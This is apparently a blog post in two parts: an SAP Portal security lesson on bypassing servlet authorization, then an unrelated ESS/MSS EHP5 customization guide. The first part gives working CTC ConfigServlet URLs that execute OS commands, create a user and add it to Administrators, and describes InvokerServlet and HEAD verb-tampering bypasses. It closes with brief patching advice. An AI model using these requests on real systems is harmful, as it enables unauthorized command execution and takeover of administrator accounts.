SAP Portal Security, lesson 2: Hacking Servlets

In my previous post we discussed portal architecture, features and mostly Knowledge Management (KM) vulnerabilities. In this post we will discuss main security mechanism embedded in the SAP Portal applications, and how we can override some of them.

*  I assume that you are familiar with basic HTTP mechanisms, POST / GET / HEAD methods, and you know that SAP Portal runs J2EE engine.

* All commands below were executed on actual SAP portal installations, which are exposed to WWW and have not been secured properly.

XML Descriptors and Invoker Servlet

Access to servlet applications deployed on SAP Portal engine are controlled by XML descriptor files. Many of those SAP standard applications have serious security breaches. Here is an example of such a descriptor file:

<?xml version="1.0" encoding="UTF-8 ?> <web-app> <display-name>HelloWorld Application</display-name> <description> This is a simple web application for Ivan's blog </description> <servlet> <servlet-name>HelloServlet</servlet-name> <servlet-class>examples.Hello</servlet-class> </servlet> <servlet-mapping> <servlet-name>HelloServlet</servlet-name> <url-pattern>/hello</url-pattern> </servlet-mapping> <security-constraint> <web-resource-collection> <web-resource-name>Restrictedaccess</web-resource-name> <url-pattern>/hello/*</url-pattern> <http-method>GET</http-method> </web-resource-collection> <auth-constraint> <role-name>Administrator</role-name> </auth-constraint> </security-constraint> </web-app>

As you can see, the servlet above is defined for access by /hello/... URL pattern, and GET requests will be accepted from user with Administrator role assigned. In order to override these settings hackers can use InvokerServlet, which  is enabled in SAP portals by default. This servlet allows accessing other servlet methods by using structured URLs, without passing the authorization check.

The servlet above could be accessed by http://{server:port}/servlet/examples.Hello by all users, as URL pattern is not matching the rule defined in XML descriptor. 

Let's take a deeper look.

Verb Tampering

The most critical of all servlets is called CTC, which allows execution of OS commands and creation of local users. Imagine that hackers could create an administrative user in your portal, with a simple command called from their browser. 

Here is an example of such a command, executed from your browser:
/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig

Now, as I told before, CTC servlet could be used to manage users. The command below will create a user in local UME:

/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME={enter your user},PASSWORD={enter your password}

Hey, there is even a success message:

After creating the user, we need to add administrative permissions. Guess what, there is a command for that as well:

/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME={enter your user},GROUPNAME=Administrators

There you go, now you have an administrator account in the system.

As you see from screenshots above, we used a simple GET method to execute those commands. For cases where GET / POST methods are secured, we can use HEAD methods, which don't match the XML descriptor file. 

Tips to keep it secure

1. Make sure your system is up to date. 

2. Block direct servlet execution (for example, by SAP WebDispatcher URL filtering)

3. Install notes 1467771, 1445998, 1503579,1616259 (if relevant)

Next post will cover user secure storage and encryption, cross-site scripting (XSS) and security zone attacks.

Stay tuned :-)

ESS / MSS Customization in EHP5

Intro

As you all might already heard, SAP is going ABAP all the way, meaning Employee Self Services (ESS) are all ABAP-based, since ECC EHP5 release. Manager Self-Services remain to be ABAP+Java, at least in EHP5 version. Although customization of ESS is done on ECC side, there is a common tradition to ask your portal consultant to do that. So, if you are either an HR consultant that wants to learn the subject, or a portal one-man-show consultant, this guide will help you start!

Pre-requisites

First of all, you can find the official ESS business package documentation here, or if you are into MSS as well - you can find it here. Let's start with the requirements:

1. Enable IGS on your ECC server, according to note 1527176
2. Make sure you have the required ESS & MSS business content deployed & enabled on ECC 
3. On portal side, create EHP5 system in System Landscape. Please make sure you add a system alias "SAP_ECC_HumanResources". Now test the connection. Following tests must succeed:
   
   Add following system aliases:
   * SAP_ECC_Common*
   * SAP_EREC_TalentManagement
   * SAP_ECC_HumanResources
4. Download following portal business content from service marketplace, and upload it to portal through JSPM / developer studio:
   
   * BPERPESSWDA05 – according to note 1450179
   * BPERP5MSS05 (BP ERP05 MSS 1.51)
   * BPERPCOM05 -  COMMON PARTS
   * SAP MSS 630 – MSS WD for Java applications
   * PCUI_GP 633 -  component pre-requisite WD for Java applications
   
   The content you downloaded for deployment will consist of the following:
   
5. Download following WebDynpro Java components for MSS from service marketplace (only if you plan to use the MSS):
   
   
   
   * PCUI_GP
   * MSS
   * SAP_PSS (if you use project management)
6. Create required RFCconnections in WebDynpro content administrator
7. Assign yourself the roles provided in business content:ESS: com.sap.pct.erp.ess.wda.Employee_Self_Service_WDA
   MSS: com.sap.pct.erp.mss.manager_self_service

Launchpad Customization

Launchpad is the first screen users land on when accessing the ESS. Please follow these steps in ECC:

1. Run LPD_CUST and select ESS MENU
   
2. Copy the launchpad to ZESS
   
3. Remove unrelated applications (delete or move to inactive folder)
   
4. You can add your portal custom applications starting with /irj/servlet/prt/portal/prtroot/pcd!3aportal_content!2f...
5. Change the role of launchpad to ZESS, which was created in step 2:
6. Save and exit

ESS Customization

Here you will see example of personal info page customization.

1. Go to SE80 and open package PAOC_ESS_PER_WDA
2. Drill down to application configuration, and click "Start Configurator"
   
   
3. Click "Go to component configuration" and click "Start Deep Copy
4. Create a new package, and a new transport request, and then click "Ok"
   You will end up with a new configuration:
   
   
5. Once your custom deep-copy component configuration is created, use Shift+F8 in order to launch the UIBB (building blocks) customization
6. Once customized, go to LPD_CUST and set your new application configuration instead of the standard one

You can refer to SAP documentation in order to find the component package & name which you would like to customize.

* MSS Customization is still performed in the old Java-way, by launching relevant applications in Preview mode from portal Content Admin, and then Ctrl + Right click.

If you are interested in further development & support, please contact me directly.

Good luck!